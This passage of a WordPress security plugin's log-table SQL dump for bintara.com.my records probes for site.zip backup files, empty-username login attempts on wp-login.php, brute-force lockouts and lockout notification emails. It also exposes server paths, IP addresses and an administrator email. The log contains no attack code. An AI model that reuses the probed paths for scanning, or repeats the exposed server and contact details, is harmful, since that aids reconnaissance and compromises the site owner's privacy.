forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/dev/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/dev/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTggAAAJc\";s:12:\"REDIRECT_URL\";s:13:\"/dev/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52579\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/dev/site.zip\";s:10:\"SCRIPT_URL\";s:13:\"/dev/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTggAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.5797\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35517592,37322024,'http://bintara.com.my/dev/site.zip',1,0,'103.133.215.103'),(27168,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp2/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/wp2/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp2/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThQAAAI0\";s:12:\"REDIRECT_URL\";s:13:\"/wp2/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52589\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/wp2/site.zip\";s:10:\"SCRIPT_URL\";s:13:\"/wp2/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThQAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.5932\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35519040,37322320,'http://bintara.com.my/wp2/site.zip',1,0,'103.133.215.103'),(27169,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/blogs/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/blogs/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/blogs/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTgwAAAJU\";s:12:\"REDIRECT_URL\";s:15:\"/blogs/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52599\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/blogs/site.zip\";s:10:\"SCRIPT_URL\";s:15:\"/blogs/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTgwAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.4987\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35517688,37322296,'http://bintara.com.my/blogs/site.zip',1,0,'103.133.215.103'),(26336,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2hrfBTP0kPOVnb8jybwAAAEU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"192.95.30.27\";s:11:\"REMOTE_PORT\";s:5:\"58978\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2hrfBTP0kPOVnb8jybwAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076870.2132\";s:12:\"REQUEST_TIME\";s:10:\"1569076870\";}}','notice','2019-09-21 14:41:11','2019-09-21 14:41:10',18159464,19648288,'https://bintara.com.my/test/wp-login.php',1,0,'192.95.30.27'),(26337,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2lnkXpgmG5P@iB8lAjAAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.165.118.82\";s:11:\"REMOTE_PORT\";s:5:\"32984\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2lnkXpgmG5P@iB8lAjAAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076886.7805\";s:12:\"REQUEST_TIME\";s:10:\"1569076886\";}}','notice','2019-09-21 14:41:28','2019-09-21 14:41:27',18162760,19652720,'https://bintara.com.my/wp/wp-login.php',1,0,'185.165.118.82'),(26338,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:41:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:41:27\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:41:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:41:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:41:28','2019-09-21 14:41:27',18247664,19652720,'https://bintara.com.my/wp/wp-login.php',1,0,'185.165.118.82'),(26339,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:41:28','2019-09-21 14:41:27',18454232,19652720,'https://bintara.com.my/wp/wp-login.php',1,0,'185.165.118.82'),(26340,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2mHkXpgmG5P@iB8lAjQAAAJQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"212.47.228.121\";s:11:\"REMOTE_PORT\";s:5:\"46540\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2mHkXpgmG5P@iB8lAjQAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076888.2043\";s:12:\"REQUEST_TIME\";s:10:\"1569076888\";}}','notice','2019-09-21 14:41:29','2019-09-21 14:41:28',18160192,19648944,'https://bintara.com.my/2019/wp-login.php',1,0,'212.47.228.121'),(26341,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:41:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:41:28\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:41:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:41:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:41:29','2019-09-21 14:41:28',18245080,19648944,'https://bintara.com.my/2019/wp-login.php',1,0,'212.47.228.121'),(26342,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:41:29','2019-09-21 14:41:28',18451888,19648944,'https://bintara.com.my/2019/wp-login.php',1,0,'212.47.228.121'),(26343,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2rbfBTP0kPOVnb8jydAAAAEw\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"49370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2rbfBTP0kPOVnb8jydAAAAEw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076909.7496\";s:12:\"REQUEST_TIME\";s:10:\"1569076909\";}}','notice','2019-09-21 14:41:50','2019-09-21 14:41:50',18160000,19648016,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.74.119'),(26344,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:41:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:41:50\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:41:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:41:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:41:51','2019-09-21 14:41:50',18244704,19648016,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.74.119'),(26345,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:41:51','2019-09-21 14:41:50',18451344,19648016,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.74.119'),(26346,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 